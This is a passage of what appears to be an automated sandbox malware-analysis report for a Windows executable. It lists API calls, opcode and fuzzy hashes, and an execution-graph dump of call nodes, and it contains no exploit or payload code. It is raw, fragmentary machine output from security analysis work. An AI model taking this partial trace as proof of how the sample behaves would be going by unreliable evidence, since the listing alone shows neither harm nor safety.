                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: InfoLocale$DefaultSystem
                                                            • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                            • API String ID: 1044490935-665933166
                                                            • Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                            • Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
                                                            • Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                            • Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C
                                                            APIs
                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                            • LocalFree.KERNEL32(0052F6E0,00000000,00401AB4), ref: 00401A1B
                                                            • VirtualFree.KERNEL32(?,00000000,00008000,0052F6E0,00000000,00401AB4), ref: 00401A3A
                                                            • LocalFree.KERNEL32(005306E0,?,00000000,00008000,0052F6E0,00000000,00401AB4), ref: 00401A79
                                                            • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                            • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                            • String ID:
                                                            • API String ID: 3782394904-0
                                                            • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                            • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                            • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                            • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                            APIs
                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                            • ExitProcess.KERNEL32 ref: 00403DE5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ExitMessageProcess
                                                            • String ID: Error$Runtime error at 00000000$9@
                                                            • API String ID: 1220098344-1503883590
                                                            • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                            • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                            • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                            • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocString
                                                            • String ID:
                                                            • API String ID: 262959230-0
                                                            • Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                            • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                            • Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                            • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                            • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CommandHandleLineModule
                                                            • String ID: U1hd.@$h'Q
                                                            • API String ID: 2123368496-1356433045
                                                            • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                            • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                            • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                            • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                            APIs
                                                            • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                            • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                            • String ID:
                                                            • API String ID: 730355536-0
                                                            • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                            • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                            • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                            • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                            APIs
                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: QueryValue
                                                            • String ID: )q@
                                                            • API String ID: 3660427363-2284170586
                                                            • Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                            • Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
                                                            • Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                            • Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
                                                            APIs
                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastSleep
                                                            • String ID:
                                                            • API String ID: 1458359878-0
                                                            • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                            • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                            • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                            • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                            Execution Graph

                                                            Execution Coverage:16%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:4.3%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:69
                                                            execution_graph 49694 40cf00 49695 40cf12 49694->49695 49696 40cf0d 49694->49696 49698 406f50 CloseHandle 49696->49698 49698->49695 55841 4413a4 55842 4413ad 55841->55842 55843 4413bb WriteFile 55841->55843 55842->55843 55844 4413c6 55843->55844 49699 492208 49700 49223c 49699->49700 49701 49223e 49700->49701 49702 492252 49700->49702 49845 446fac 18 API calls 49701->49845 49705 492261 49702->49705 49707 49228e 49702->49707 49704 492247 Sleep 49727 4922c5 49704->49727 49706 447008 18 API calls 49705->49706 49709 492270 49706->49709 49711 4922ca 49707->49711 49712 49229d 49707->49712 49713 492278 FindWindowA 49709->49713 49717 4922d9 49711->49717 49718 492320 49711->49718 49835 447008 49712->49835 49715 447288 5 API calls 49713->49715 49719 492289 49715->49719 49716 4922aa 49721 4922b2 FindWindowA 49716->49721 49846 446fac 18 API calls 49717->49846 49724 49237c 49718->49724 49725 49232f 49718->49725 49719->49727 49839 447288 49721->49839 49722 4922e5 49847 446fac 18 API calls 49722->49847 49734 4923d8 49724->49734 49735 49238b 49724->49735 49850 446fac 18 API calls 49725->49850 49885 403420 49727->49885 49729 4922f2 49848 446fac 18 API calls 49729->49848 49730 49233b 49851 446fac 18 API calls 49730->49851 49733 4922ff 49849 446fac 18 API calls 49733->49849 49745 492412 49734->49745 49746 4923e7 49734->49746 49855 446fac 18 API calls 49735->49855 49737 492348 49852 446fac 18 API calls 49737->49852 49739 492397 49856 446fac 18 API calls 49739->49856 49741 49230a SendMessageA 49744 447288 5 API calls 49741->49744 49743 492355 49853 446fac 18 API calls 49743->49853 49744->49719 49754 492421 49745->49754 49755 492460 49745->49755 49749 447008 18 API calls 49746->49749 49747 4923a4 49857 446fac 18 API calls 49747->49857 49752 4923f4 49749->49752 49751 492360 PostMessageA 49854 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49751->49854 49757 4923fc RegisterClipboardFormatA 49752->49757 49753 4923b1 49858 446fac 18 API calls 49753->49858 49860 446fac 18 API calls 49754->49860 49763 49246f 49755->49763 49764 4924b4 49755->49764 49760 447288 5 API calls 49757->49760 49760->49727 49761 4923bc SendNotifyMessageA 49859 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49761->49859 49762 49242d 49861 446fac 18 API calls 49762->49861 49863 446fac 18 API calls 49763->49863 49773 492508 49764->49773 49774 4924c3 49764->49774 49768 49243a 49862 446fac 18 API calls 49768->49862 49769 49247b 49864 446fac 18 API calls 49769->49864 49772 492445 SendMessageA 49777 447288 5 API calls 49772->49777 49782 49256a 49773->49782 49783 492517 49773->49783 49867 446fac 18 API calls 49774->49867 49776 492488 49865 446fac 18 API calls 49776->49865 49777->49719 49778 4924cf 49868 446fac 18 API calls 49778->49868 49781 492493 PostMessageA 49866 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49781->49866 49790 492579 49782->49790 49791 4925f1 49782->49791 49786 447008 18 API calls 49783->49786 49784 4924dc 49869 446fac 18 API calls 49784->49869 49788 492524 49786->49788 49871 42e3a4 SetErrorMode 49788->49871 49789 4924e7 SendNotifyMessageA 49870 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49789->49870 49794 447008 18 API calls 49790->49794 49800 492600 49791->49800 49801 492626 49791->49801 49798 492588 49794->49798 49795 492531 49796 492547 GetLastError 49795->49796 49797 492537 49795->49797 49802 447288 5 API calls 49796->49802 49799 447288 5 API calls 49797->49799 49874 446fac 18 API calls 49798->49874 49803 492545 49799->49803 49879 446fac 18 API calls 49800->49879 49810 492658 49801->49810 49811 492635 49801->49811 49802->49803 49807 447288 5 API calls 49803->49807 49806 49260a FreeLibrary 49880 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49806->49880 49807->49727 49808 49259b GetProcAddress 49812 4925e1 49808->49812 49813 4925a7 49808->49813 49818 492667 49810->49818 49824 49269b 49810->49824 49814 447008 18 API calls 49811->49814 49878 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49812->49878 49875 446fac 18 API calls 49813->49875 49816 492641 49814->49816 49822 492649 CreateMutexA 49816->49822 49881 48c638 18 API calls 49818->49881 49819 4925b3 49876 446fac 18 API calls 49819->49876 49822->49727 49823 4925c0 49827 447288 5 API calls 49823->49827 49824->49727 49883 48c638 18 API calls 49824->49883 49826 492673 49828 492684 OemToCharBuffA 49826->49828 49829 4925d1 49827->49829 49882 48c650 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49828->49882 49877 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49829->49877 49832 4926b6 49833 4926c7 CharToOemBuffA 49832->49833 49884 48c650 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49833->49884 49836 447010 49835->49836 49889 436088 49836->49889 49838 44702f 49838->49716 49840 447290 49839->49840 49943 4363f0 VariantClear 49840->49943 49842 4472b3 49843 4472ca 49842->49843 49944 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49842->49944 49843->49727 49845->49704 49846->49722 49847->49729 49848->49733 49849->49741 49850->49730 49851->49737 49852->49743 49853->49751 49854->49719 49855->49739 49856->49747 49857->49753 49858->49761 49859->49727 49860->49762 49861->49768 49862->49772 49863->49769 49864->49776 49865->49781 49866->49719 49867->49778 49868->49784 49869->49789 49870->49727 49945 403738 49871->49945 49874->49808 49875->49819 49876->49823 49877->49719 49878->49719 49879->49806 49880->49727 49881->49826 49882->49727 49883->49832 49884->49727 49887 403426 49885->49887 49886 40344b 49887->49886 49888 402660 4 API calls 49887->49888 49888->49887 49890 436094 49889->49890 49906 4360b6 49889->49906 49890->49906 49909 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49890->49909 49891 436139 49918 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49891->49918 49893 436121 49913 403494 49893->49913 49894 436109 49898 403510 4 API calls 49894->49898 49895 4360fd 49910 403510 49895->49910 49896 43612d 49917 4040e8 18 API calls 49896->49917 49903 436112 49898->49903 49902 43614a 49902->49838 49903->49838 49904 436115 49904->49838 49906->49891 49906->49893 49906->49894 49906->49895 49906->49896 49906->49904 49907 436136 49907->49838 49909->49906 49919 4034e0 49910->49919 49915 403498 49913->49915 49914 4034ba 49914->49838 49915->49914 49916 402660 4 API calls 49915->49916 49916->49914 49917->49907 49918->49902 49924 4034bc 49919->49924 49922 4034f0 49929 403400 49922->49929 49925 4034c0 49924->49925 49926 4034dc 49924->49926 49933 402648 49925->49933 49926->49922 49928 4034c9 49928->49922 49930 403406 49929->49930 49931 40341f 49929->49931 49930->49931 49938 402660 49930->49938 49931->49838 49934 40264c 49933->49934 49935 402656 49933->49935 49934->49935 49937 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49934->49937 49935->49928 49935->49935 49937->49935 49939 402664 49938->49939 49941 40266e 49938->49941 49939->49941 49942 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49939->49942 49941->49931 49942->49941 49943->49842 49944->49843 49946 40373c LoadLibraryA 49945->49946 49946->49795 49947 402584 49948 402598 49947->49948 49949 4025ab 49947->49949 49977 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 49948->49977 49950 4025c2 RtlEnterCriticalSection 49949->49950 49951 4025cc 49949->49951 49950->49951 49963 4023b4 13 API calls 49951->49963 49953 40259d 49953->49949 49955 4025a1 49953->49955 49956 4025d9 49959 402635 49956->49959 49960 40262b RtlLeaveCriticalSection 49956->49960 49957 4025d5 49957->49956 49964 402088 49957->49964 49960->49959 49961 4025e5 49961->49956 49978 402210 9 API calls 49961->49978 49963->49957 49965 40209c 49964->49965 49966 4020af 49964->49966 49985 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 49965->49985 49968 4020c6 RtlEnterCriticalSection 49966->49968 49971 4020d0 49966->49971 49968->49971 49969 4020a1 49969->49966 49970 4020a5 49969->49970 49974 402106 49970->49974 49971->49974 49979 401f94 49971->49979 49974->49961 49975 4021f1 RtlLeaveCriticalSection 49976 4021fb 49975->49976 49976->49961 49977->49953 49978->49956 49980 401fa4 49979->49980 49981 401fd0 49980->49981 49984 401ff4 49980->49984 49986 401f0c 49980->49986 49981->49984 49991 401db4 49981->49991 49984->49975 49984->49976 49985->49969 49995 40178c 49986->49995 49989 401f29 49989->49980 49992 401dd2 49991->49992 49993 401e02 49991->49993 49992->49984 49993->49992 50018 401d1c 49993->50018 49998 4017a8 49995->49998 49997 4017b2 50014 401678 VirtualAlloc 49997->50014 49998->49997 50000 40180f 49998->50000 50002 401803 49998->50002 50006 4014e4 49998->50006 50015 4013e0 LocalAlloc 49998->50015 50000->49989 50005 401e80 9 API calls 50000->50005 50016 4015c0 VirtualFree 50002->50016 50003 4017be 50003->50000 50005->49989 50007 4014f3 VirtualAlloc 50006->50007 50009 401520 50007->50009 50010 401543 50007->50010 50017 401398 LocalAlloc 50009->50017 50010->49998 50012 40152c 50012->50010 50013 401530 VirtualFree 50012->50013 50013->50010 50014->50003 50015->49998 50016->50000 50017->50012 50019 401d2e 50018->50019 50020 401d51 50019->50020 50021 401d63 50019->50021 50031 401940 50020->50031 50023 401940 3 API calls 50021->50023 50024 401d61 50023->50024 50025 401d79 50024->50025 50041 401bf8 9 API calls 50024->50041 50025->49992 50027 401d88 50028 401da2 50027->50028 50042 401c4c 9 API calls 50027->50042 50043 401454 LocalAlloc 50028->50043 50032 401966 50031->50032 50040 4019bf 50031->50040 50044 40170c 50032->50044 50036 401983 50038 40199a 50036->50038 50049 4015c0 VirtualFree 50036->50049 50038->50040 50050 401454 LocalAlloc 50038->50050 50040->50024 50041->50027 50042->50028 50043->50025 50045 401743 50044->50045 50046 401783 50045->50046 50047 40175d VirtualFree 50045->50047 50048 4013e0 LocalAlloc 50046->50048 50047->50045 50048->50036 50049->50038 50050->50040 55845 48042c 55850 450ff0 55845->55850 55847 480440 55860 47f518 55847->55860 55849 480464 55851 450ffd 55850->55851 55853 451051 55851->55853 55866 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55851->55866 55854 450e74 InterlockedExchange 55853->55854 55855 451063 55854->55855 55857 451079 55855->55857 55867 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55855->55867 55858 4510bc 55857->55858 55868 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55857->55868 55858->55847 55869 40b5c8 55860->55869 55862 47f53a 55863 47f585 55862->55863 55864 4069e4 4 API calls 55862->55864 55873 4768b0 55862->55873 55863->55849 55864->55862 55866->55853 55867->55857 55868->55858 55871 40b5d3 55869->55871 55870 40b5f3 55870->55862 55871->55870 55889 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55871->55889 55881 4768e1 55873->55881 55883 47692a 55873->55883 55874 476975 55890 451280 55874->55890 55876 451280 21 API calls 55876->55883 55877 4038a4 4 API calls 55877->55881 55878 47698c 55879 403420 4 API calls 55878->55879 55882 4769a6 55879->55882 55880 4038a4 4 API calls 55880->55883 55881->55877 55881->55883 55884 403744 4 API calls 55881->55884 55885 403450 4 API calls 55881->55885 55888 451280 21 API calls 55881->55888 55882->55862 55883->55874 55883->55876 55883->55880 55886 403744 4 API calls 55883->55886 55887 403450 4 API calls 55883->55887 55884->55881 55885->55881 55886->55883 55887->55883 55888->55881 55889->55870 55891 45129b 55890->55891 55895 451290 55890->55895 55896 451224 21 API calls 55891->55896 55893 4512a6 55893->55895 55897 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55893->55897 55895->55878 55896->55893 55897->55895 55898 41ee64 55899 41ee73 IsWindowVisible 55898->55899 55900 41eea9 55898->55900 55899->55900 55901 41ee7d IsWindowEnabled 55899->55901 55901->55900 55902 41ee87 55901->55902 55903 402648 4 API calls 55902->55903 55904 41ee91 EnableWindow 55903->55904 55904->55900 55905 41fb68 55906 41fb71 55905->55906 55909 41fe0c 55906->55909 55908 41fb7e 55910 41fefe 55909->55910 55911 41fe23 55909->55911 55910->55908 55911->55910 55930 41f9cc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 55911->55930 55913 41fe59 55914 41fe83 55913->55914 55915 41fe5d 55913->55915 55940 41f9cc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 55914->55940 55931 41fbac 55915->55931 55918 41fe91 55920 41fe95 55918->55920 55921 41febb 55918->55921 55924 41fbac 10 API calls 55920->55924 55925 41fbac 10 API calls 55921->55925 55922 41fbac 10 API calls 55923 41fe81 55922->55923 55923->55908 55926 41fea7 55924->55926 55927 41fecd 55925->55927 55928 41fbac 10 API calls 55926->55928 55929 41fbac 10 API calls 55927->55929 55928->55923 55929->55923 55930->55913 55932 41fbc7 55931->55932 55933 41fbdd 55932->55933 55934 41f94c 4 API calls 55932->55934 55941 41f94c 55933->55941 55934->55933 55936 41fc25 55937 41fc48 SetScrollInfo 55936->55937 55949 41faac 55937->55949 55940->55918 55942 4181f0 55941->55942 55943 41f969 GetWindowLongA 55942->55943 55944 41f9a6 55943->55944 55945 41f986 55943->55945 55961 41f8d8 GetWindowLongA GetSystemMetrics GetSystemMetrics 55944->55961 55960 41f8d8 GetWindowLongA GetSystemMetrics GetSystemMetrics 55945->55960 55948 41f992 55948->55936 55950 41faba 55949->55950 55951 41fac2 55949->55951 55950->55922 55952 41fb01 55951->55952 55953 41faf1 55951->55953 55959 41faff 55951->55959 55963 417e58 IsWindowVisible ScrollWindow SetWindowPos 55952->55963 55962 417e58 IsWindowVisible ScrollWindow SetWindowPos 55953->55962 55954 41fb41 GetScrollPos 55954->55950 55957 41fb4c 55954->55957 55958 41fb5b SetScrollPos 55957->55958 55958->55950 55959->55954 55960->55948 55961->55948 55962->55959 55963->55959 55964 4205a8 55965 4205bb 55964->55965 55985 415b40 55965->55985 55967 420702 55968 420719 55967->55968 55992 4146e4 KiUserCallbackDispatcher 55967->55992 55972 420730 55968->55972 55993 414728 KiUserCallbackDispatcher 55968->55993 55969 420661 55990 420858 20 API calls 55969->55990 55970 4205f6 55970->55967 55970->55969 55978 420652 MulDiv 55970->55978 55975 420752 55972->55975 55994 420070 12 API calls 55972->55994 55976 42067a 55976->55967 55991 420070 12 API calls 55976->55991 55989 41a314 LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 55978->55989 55981 420697 55982 4206b3 MulDiv 55981->55982 55983 4206d6 55981->55983 55982->55983 55983->55967 55984 4206df MulDiv 55983->55984 55984->55967 55986 415b52 55985->55986 55995 414480 55986->55995 55988 415b6a 55988->55970 55989->55969 55990->55976 55991->55981 55992->55968 55993->55972 55994->55975 55996 41449a 55995->55996 55999 410658 55996->55999 55998 4144b0 55998->55988 56002 40dea4 55999->56002 56001 41065e 56001->55998 56003 40df06 56002->56003 56004 40deb7 56002->56004 56009 40df14 56003->56009 56007 40df14 19 API calls 56004->56007 56008 40dee1 56007->56008 56008->56001 56010 40df24 56009->56010 56012 40df3a 56010->56012 56021 40e29c 56010->56021 56037 40d7e0 56010->56037 56040 40e14c 56012->56040 56015 40d7e0 5 API calls 56016 40df42 56015->56016 56016->56015 56017 40dfae 56016->56017 56043 40dd60 56016->56043 56018 40e14c 5 API calls 56017->56018 56020 40df10 56018->56020 56020->56001 56057 40eb6c 56021->56057 56023 403778 4 API calls 56025 40e2d7 56023->56025 56024 40e38d 56026 40e3b7 56024->56026 56027 40e3a8 56024->56027 56025->56023 56025->56024 56120 40d974 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56025->56120 56121 40e280 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56025->56121 56117 40bc24 56026->56117 56066 40e5c0 56027->56066 56032 40e3b5 56034 403400 4 API calls 56032->56034 56035 40e45c 56034->56035 56035->56010 56038 40ec08 5 API calls 56037->56038 56039 40d7ea 56038->56039 56039->56010 56154 40d6bc 56040->56154 56163 40e154 56043->56163 56046 40eb6c 5 API calls 56047 40dd9e 56046->56047 56048 40eb6c 5 API calls 56047->56048 56049 40dda9 56048->56049 56050 40ddc4 56049->56050 56051 40ddbb 56049->56051 56056 40ddc1 56049->56056 56170 40dbd8 56050->56170 56173 40dcc8 19 API calls 56051->56173 56054 403420 4 API calls 56055 40de8f 56054->56055 56055->56016 56056->56054 56123 40d980 56057->56123 56060 4034e0 4 API calls 56061 40eb8f 56060->56061 56062 403744 4 API calls 56061->56062 56063 40eb96 56062->56063 56064 40d980 5 API calls 56063->56064 56065 40eba4 56064->56065 56065->56025 56067 40e5f6 56066->56067 56068 40e5ec 56066->56068 56070 40e711 56067->56070 56071 40e695 56067->56071 56072 40e6f6 56067->56072 56073 40e776 56067->56073 56074 40e638 56067->56074 56075 40e6d9 56067->56075 56076 40e67a 56067->56076 56077 40e6bb 56067->56077 56110 